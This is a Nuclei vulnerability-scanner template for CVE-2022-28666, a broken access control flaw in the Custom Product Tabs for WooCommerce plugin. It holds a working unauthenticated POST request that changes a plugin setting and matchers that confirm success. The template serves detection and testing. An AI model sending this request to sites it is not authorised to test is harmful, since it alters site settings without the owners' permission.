id: CVE-2022-28666

info:
  name: Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update
  author: Sourabh-Sahu
  severity: medium
  description: |
    YIKES Inc. Custom Product Tabs for WooCommerce plugin \u003C= 1.7.7 contains a broken access control caused by improper permission checks in &yikes-the-content-toggle option update, letting attackers modify content without authorization.
  impact: |
    Attackers can modify product tab content without authorization, potentially leading to content tampering or misinformation.
  remediation: |
    Update to the latest version of the plugin, above 1.7.7.
  reference:
    - https://wpscan.com/vulnerability/2f20e14b-3a97-41c5-a3ce-054ed2450aa3/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-28666
    epss-score: 0.01184
    epss-percentile: 0.63642
    cwe-id: CWE-287
    cpe: cpe:2.3:a:yikesinc:custom_product_tabs_for_woocommerce:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "yikes-inc-easy-custom"
  tags: cve,cve2022,wordpress,wp-plugin,wp,custom_product_tabs_for_woocommerce,vkev,intrusive

http:
  - raw:
      - |
        POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest

        toggle_the_content=false

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'success','Settings updated')"
          - "contains(content_type, 'application/json')"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100dca857fe40c8b7f46a5659357f76e8f543f9b143259113f3ada076daf52a29bb022030aeb39d24c11616b1267b11f03cda4857c6d2f9e2fa5136c91d87885a29ec88:922c64590222798bb761d5b6d8e72950